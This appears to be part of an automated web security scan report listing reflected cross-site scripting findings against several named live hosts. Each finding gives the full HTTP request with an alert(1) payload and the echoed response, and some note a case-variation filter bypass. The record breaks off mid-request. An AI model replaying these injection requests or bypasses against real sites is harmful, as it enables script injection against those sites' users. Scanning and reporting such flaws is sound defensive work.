Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:41 GMT
Date: Mon, 18 Jul 2011 19:11:41 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
ry{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"2ee04<script>alert(1)</script>178a92e0c0a", c4:"", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.15. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 8abc0<script>alert(1)</script>331f5ae8f30 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=8abc0<script>alert(1)</script>331f5ae8f30&c5=&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:42 GMT
Date: Mon, 18 Jul 2011 19:11:42 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"8abc0<script>alert(1)</script>331f5ae8f30", c5:"", c6:"", c10:"", c15:"", c16:"", r:""});



3.16. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ad9d9<script>alert(1)</script>a40c8ea54bb was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=ad9d9<script>alert(1)</script>a40c8ea54bb&c6=&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:42 GMT
Date: Mon, 18 Jul 2011 19:11:42 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"ad9d9<script>alert(1)</script>a40c8ea54bb", c6:"", c10:"", c15:"", c16:"", r:""});



3.17. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e2bc3<script>alert(1)</script>b8ff09a0d87 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6036211&c3=&c4=&c5=&c6=e2bc3<script>alert(1)</script>b8ff09a0d87&c10= HTTP/1.1
Host: b.scorecardresearch.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redmondpie.com/jailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial/
Cookie: UID=7bff5a9c-72.246.30.32-1308590022

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 25 Jul 2011 19:11:43 GMT
Date: Mon, 18 Jul 2011 19:11:43 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6036211", c3:"", c4:"", c5:"", c6:"e2bc3<script>alert(1)</script>b8ff09a0d87", c10:"", c15:"", c16:"", r:""});



3.18. http://cgibin.erols.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 57d8c<script>alert(1)</script>80cbe202f74 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 HTTP/1.1
Host: cgibin.erols.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Date: Mon, 18 Jul 2011 02:20:57 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html
Content-Length: 320

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /favicon.ico57d8c<script>alert(1)</script>80cbe202f74 was not found on this server.<P>
...[SNIP]...

3.19. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload af98e<script>alert(1)</script>44657fdf20a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:28 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziringaf98e<script>alert(1)</script>44657fdf20a/cgi-bin/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.20. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36894<script>alert(1)</script>b3fd1e87874 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:29 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin36894<script>alert(1)</script>b3fd1e87874/nsgate/gate.pl was not found on this server.<P>
...[SNIP]...

3.21. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f324a<script>alert(1)</script>edcfd067e35 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:30 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgatef324a<script>alert(1)</script>edcfd067e35/gate.pl was not found on this server.<P>
...[SNIP]...

3.22. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8e515<script>alert(1)</script>5341abcd9af was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Mon, 18 Jul 2011 02:16:33 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>404 Not Found</TITLE>
</HEAD><BODY>
<H1>Not Found</H1>
The requested URL /ziring/cgi-bin/nsgate/gate.pl8e515<script>alert(1)</script>5341abcd9af was not found on this server.<P>
...[SNIP]...

3.23. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cgibin.erols.com
Path:   /ziring/cgi-bin/nsgate/gate.pl

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 49c6f"><script>alert(1)</script>c05ff7c7c01 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1 HTTP/1.1
Host: cgibin.erols.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Mon, 18 Jul 2011 02:16:12 GMT
Server: Apache/1.3.26
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 3.2//EN">
<!-- Template top.phtml -->
<HTML>
<head>
<TITLE>Super DNS Lookup Gateway
</TITLE>
<META Name="author" Content="Neal Ziring">
<META Name="keyw
...[SNIP]...
<form method="get" action="/ziring/cgi-bin/nsgate/gate.pl?49c6f"><script>alert(1)</script>c05ff7c7c01=1" enctype="application/x-www-form-urlencoded">
...[SNIP]...

3.24. http://choices.truste.com/ca [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 51b45<script>alert(1)</script>2093950a9e2 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont151b45<script>alert(1)</script>2093950a9e2&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:11:56 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 7359

if (typeof truste == "undefined" || !truste) {

window.log=function(){log.history=log.history||[];log.history.push(arguments);if(this.console){console.log(Array.prototype.slice.call(arguments))}};
...[SNIP]...
seName] = bindings;
   };
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   };

   var te_clr1_att01cont151b45<script>alert(1)</script>2093950a9e2_ib = '<div id="te-clr1-att01cont151b45<script>
...[SNIP]...

3.25. http://choices.truste.com/ca [cid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the cid request parameter is copied into the HTML document as plain text between tags. The payload df5d5<ScRiPt>alert(1)</ScRiPt>e9bb056ed84 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250df5d5<ScRiPt>alert(1)</ScRiPt>e9bb056ed84&c=att01cont1&w=300&h=250&zi=10002&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:11:46 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5459

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
png",icon_cam:"http://choices.truste.com/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",iconText:"",aid:"att01",pid:"mec01",zindex:"10002",cam:"2",cid:"0311m300x250df5d5<ScRiPt>alert(1)</ScRiPt>e9bb056ed84"};
var tecabaseurl="http://choices.truste.com/";truste.ca.bindingInitMap[te_clr1_att01cont1_bi.baseName]=0;
truste.ca.intInitMap[te_clr1_att01cont1_bi.baseName]=te_clr1_att01cont1_ib;truste.ca.addBind
...[SNIP]...

3.26. http://choices.truste.com/ca [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 3bb57<ScRiPt>alert(1)</ScRiPt>7ebe76c2f2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&3bb57<ScRiPt>alert(1)</ScRiPt>7ebe76c2f2c=1 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:12:41 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5424

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
(e==0){truste.ca.bindingInitMap[c.baseName]=e+1;var d=document.createElement("script");d.src="http://choices.truste.com/ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr&3bb57<ScRiPt>alert(1)</ScRiPt>7ebe76c2f2c=1&js=2";
document.body.appendChild(d);var a=document.createElement("div");a.innerHTML=te_clr1_att01cont1_ib;var f=a.firstChild;
while(f&&f.nodeType==3){f=f.nextSibling}truste.ca.intMap[c.baseName]=f}}
...[SNIP]...

3.27. http://choices.truste.com/ca [plc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 62bfb<ScRiPt>alert(1)</ScRiPt>1c7f134caf1 was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002&plc=tr62bfb<ScRiPt>alert(1)</ScRiPt>1c7f134caf1 HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:12:28 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5459

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
</div>\n\n';
var te_clr1_att01cont1_bi={baseName:"te-clr1-att01cont1",anchName:"te-clr1-att01cont1-anch",width:300,height:250,ox:0,oy:0,plc:"tr62bfb<ScRiPt>alert(1)</ScRiPt>1c7f134caf1",iplc:"rel",intDivName:"te-clr1-att01cont1-itl",iconSpanId:"te-clr1-att01cont1-icon",backgroundColor:"white",opacity:0.8,filterOpacity:80,containerId:"att01cont1",noticeBaseUrl:"http://choices.truste.
...[SNIP]...

3.28. http://choices.truste.com/ca [zi parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload b2039<ScRiPt>alert(1)</ScRiPt>96dc5815b1f was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain expressions that are often used in XSS attacks but this can be circumvented by varying the case of the blocked expressions - for example, by submitting "ScRiPt" instead of "script".

Remediation detail

Blacklist-based filters designed to block known bad inputs are usually inadequate and should be replaced with more effective input and output validation.

Request

GET /ca?pid=mec01&aid=att01&cid=0311m300x250&c=att01cont1&w=300&h=250&zi=10002b2039<ScRiPt>alert(1)</ScRiPt>96dc5815b1f&plc=tr HTTP/1.1
Host: choices.truste.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334320592/direct;wi.300;hi.250/01/6388366403?click=http://r1-ads.ace.advertising.com/click/site=0000783329/mnum=0001040499/cstr=60538233=_4e248527,6388366403,783329^1040499^1183^0,1_/xsxdata=$XSXDATA/bnum=60538233/optn=64?trg=

Response

HTTP/1.1 200 OK
Date: Mon, 18 Jul 2011 19:12:10 GMT
Content-Type: text/javascript
Connection: keep-alive
Server: Apache-Coyote/1.1
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Vary: Accept-Encoding
Content-Length: 5459

if(typeof truste=="undefined"||!truste){window.log=function(){log.history=log.history||[];log.history.push(arguments);
if(this.console){console.log(Array.prototype.slice.call(arguments))}};var truste=
...[SNIP]...
truste.com/assets/admarker.png",icon_cam:"http://choices.truste.com/assets/adicon.png",icon_cam_daa:"http://choices.truste.com/assets/ad_choices_i.png",iconText:"",aid:"att01",pid:"mec01",zindex:"10002b2039<ScRiPt>alert(1)</ScRiPt>96dc5815b1f",cam:"2",cid:"0311m300x250"};
var tecabaseurl="http://choices.truste.com/";truste.ca.bindingInitMap[te_clr1_att01cont1_bi.baseName]=0;
truste.ca.intInitMap[te_clr1_att01cont1_bi.baseName]=te_clr1_att0
...[SNIP]...

3.29. http://citi.bridgetrack.com/a/s/ [BT_PID parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://citi.bridgetrack.com
Path:   /a/s/

Issue detail

The value of the BT_PID request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9ab5c%3balert(1)//6c36bc080fa was submitted in the BT_PID parameter. This input was echoed as 9ab5c;alert(1)//6c36bc080fa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a/s/?BT_PID=2857809ab5c%3balert(1)//6c36bc080fa&BT_CON=1&BT_PM=1&r=0.6521653183735907&_u=visitor&_d=http://www.citi.com HTTP/1.1
Host: citi.bridgetrack.com
Proxy-Connection: keep-alive
Referer: http://www.citi.com/domain/home.htm
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CitiBT%5F9=VTIEML=0&VTI3PTY=&VTIPUB=705&VTITRF=42945&VTIPRC=0&VTICAT=0&VTISEG=0&VTIWAV=0&TX=1308597549&VTICON=0&VTIPRD=0&VTICHN=0&VTIVAR=0&VTI=C0217727668617459544B4BBFBEB2A6A399958498F9F6F7E9EAC5C2DE3E204E6&VTIAS=0&VTILNK=0&SID=816F1D18DE4F4FD6AA3609CC099F2751&VTIVEN=1805; ASB18=TX=1310999261&Pb=3&A=8&SID=6EF947CD667D48E9889230E69F79EED5&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=101096&Cr=100991&W=54622&Tr=54622&Cp=5009&P=285777&B=18; ATV18=5921d1BROODc1c4SHc8N2Hc3c62c32JVc32N8cc1LAUc8ccc1LAUccccc; ASB9=TX=1310999261&Pb=3&A=8&SID=05504B672FAB48D2BDD435D2F63609B1&Vn=194&Ct=0&Pc=0&S=&Cn=1&Pd=0&T=94295&Cr=93926&W=54614&Tr=54614&Cp=4519&P=285778&B=9; ATV9=24942d1BROODc1c4D7c8N2Ic3c62c2RN6c2S2Ncc1LAMc8ccc1LAMccccc; 